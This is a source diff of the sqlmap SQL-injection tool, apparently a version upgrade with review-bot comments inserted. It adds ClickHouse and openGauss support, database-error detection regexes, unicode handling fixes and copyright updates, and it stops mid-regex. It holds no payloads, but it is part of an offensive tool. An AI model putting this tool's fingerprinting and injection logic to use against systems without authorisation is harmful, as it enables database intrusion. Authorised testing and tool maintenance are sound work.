_reversible(ex): + if INVALID_UNICODE_PRIVATE_AREA: + return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end) + else: + return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end) + + codecs.register_error("reversible", _reversible) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5731 + if not hasattr(logging, "_acquireLock"): + def _acquireLock(): + if logging._lock: + logging._lock.acquire() + + logging._acquireLock = _acquireLock + + if not hasattr(logging, "_releaseLock"): + def _releaseLock(): + if logging._lock: + logging._lock.release() + + logging._releaseLock = _releaseLock + def resolveCrossReferences(): """ Place for cross-reference resolution 
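Review bot: In `_reversible`, the format `'000f00%2x'` pads with a space rather than a zero, so an offending byte below 0x10 yields a string such as `000f00 a` and `int(..., 16)` raises ValueError from inside the codec error handler. Bytes rejected by ASCII-compatible decoders are normally 0x80 or above, which is presumably why this does not show up in practice, but the handler is registered globally under the name "reversible" and can be used with any codec. `'000f00%02x'` is the safe form. The enclosing function starts before the hunk.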
diff --git a/lib/core/profiling.py b/lib/core/profiling.py index 4f96fb3ad21..1219cb12294 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index 7871b9caaf3..b2ba5f02129 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -1,16 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ -from lib.core.data import logger -from lib.core.settings import IS_WIN -from lib.core.settings import PLATFORM - _readline = None - try: from readline import * import readline as _readline @@ -21,6 +16,10 @@ except: pass +from lib.core.data import logger +from lib.core.settings import IS_WIN +from lib.core.settings import PLATFORM + if IS_WIN and _readline: try: _outputfile = _readline.GetOutputFile() diff --git a/lib/core/replication.py b/lib/core/replication.py index 11889478ab9..5d91c470da0 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ import sqlite3 +from lib.core.common import cleanReplaceUnicode from lib.core.common import getSafeExString from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.exception import SqlmapConnectionException 
@@ -81,7 +82,10 @@ def insert(self, values): def execute(self, sql, parameters=None): try: - self.parent.cursor.execute(sql, parameters or []) + try: + self.parent.cursor.execute(sql, parameters or []) + except UnicodeError: + self.parent.cursor.execute(sql, cleanReplaceUnicode(parameters or [])) except sqlite3.OperationalError as ex: errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath diff --git a/lib/core/revision.py b/lib/core/revision.py index 9e3cd5455e2..99c5f4091f9 100644 --- a/lib/core/revision.py +++ b/lib/core/revision.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/session.py b/lib/core/session.py index 00104ebeaf7..95a29aaec86 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/settings.py b/lib/core/settings.py index ed567577e2f..9c6c173f11f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ 
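Review bot: The `UnicodeError` fallback in `execute` retries with `cleanReplaceUnicode(parameters or [])` and leaves no trace, so values stored in the replication database can differ from what was retrieved without any indication in the output. A short comment above the inner `except`, such as `# retry with invalid unicode replaced; stored values may differ from the retrieved ones`, would document this. A debug-level log message would make it visible at run time, if a logger is available in this module (none is visible in the hunk). The outer `sqlite3.OperationalError` handler continues outside the hunk.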
@@ -17,10 +17,9 @@ from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS from thirdparty import six -from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.5.10.13" +VERSION = "1.9.6.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -61,6 +60,9 @@ LOWER_RATIO_BOUND = 0.02 UPPER_RATIO_BOUND = 0.98 +# For filling in case of dumb push updates +DUMMY_JUNK = "ahy9Ouge" + # Markers for special cases when parameter values contain html encoded characters PARAMETER_AMP_MARKER = "__AMP__" PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__" @@ -68,11 +70,11 @@ PARAMETER_PERCENTAGE_MARKER = "__PERCENTAGE__" PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__" PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__" -URI_QUESTION_MARKER = "__QUESTION_MARK__" -ASTERISK_MARKER = "__ASTERISK_MARK__" -REPLACEMENT_MARKER = "__REPLACEMENT_MARK__" -BOUNDED_BASE64_MARKER = "__BOUNDED_BASE64_MARK__" -BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__" +URI_QUESTION_MARKER = "__QUESTION__" +ASTERISK_MARKER = "__ASTERISK__" +REPLACEMENT_MARKER = "__REPLACEMENT__" +BOUNDED_BASE64_MARKER = "__BOUNDED_BASE64__" +BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION__" SAFE_VARIABLE_MARKER = "__SAFE__" SAFE_HEX_MARKER = "__SAFE_HEX__" DOLLAR_MARKER = "__DOLLAR__" @@ -283,6 +285,7 @@ ALTIBASE_SYSTEM_DBS = ("SYSTEM_",) MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",) CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys") +CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system") CUBRID_SYSTEM_DBS = ("DBA",) CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS") EXTREMEDB_SYSTEM_DBS = ("",) 
@@ -293,7 +296,7 @@ # Note: () + () MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") MYSQL_ALIASES = ("mysql", "my") + ("mariadb", "maria", "memsql", "tidb", "percona", "drizzle") -PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb") +PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb", "opengauss") ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") SQLITE_ALIASES = ("sqlite", "sqlite3") ACCESS_ALIASES = ("microsoft access", "msaccess", "access", "jet") @@ -313,6 +316,7 @@ MIMERSQL_ALIASES = ("mimersql", "mimer") CRATEDB_ALIASES = ("cratedb", "crate") CUBRID_ALIASES = ("cubrid",) +CLICKHOUSE_ALIASES = ("clickhouse",) CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris") EXTREMEDB_ALIASES = ("extremedb", "extreme") FRONTBASE_ALIASES = ("frontbase",) 
@@ -321,17 +325,17 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) -SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES) +SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES) SUPPORTED_OS = ("linux", "windows") -DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES)) 
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES)) USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) # DBMSes with upper case identifiers -UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.DERBY, DBMS.ALTIBASE)) +UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.HSQLDB, DBMS.DERBY, DBMS.ALTIBASE)) # Default schemas to use (when unable to enumerate) H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC" @@ -363,6 +367,7 @@ "getCurrentUser", "getCurrentDb", "getPasswordHashes", + "getDbs", "getTables", "getColumns", "getSchema", @@ -412,6 +417,7 @@ r"(?P[^\n>]{0,100}SQL Syntax[^\n<]+)", r"(?s)
  • Error Type:
    (?P.+?)
  • ", r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", + r"Code: \d+. DB::Exception: (?P[^<>\n]*)", r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)", r"(?Pquery error: SELECT[^<>]+)" @@ -427,7 +433,7 @@ JAVASCRIPT_HREF_REGEX = r'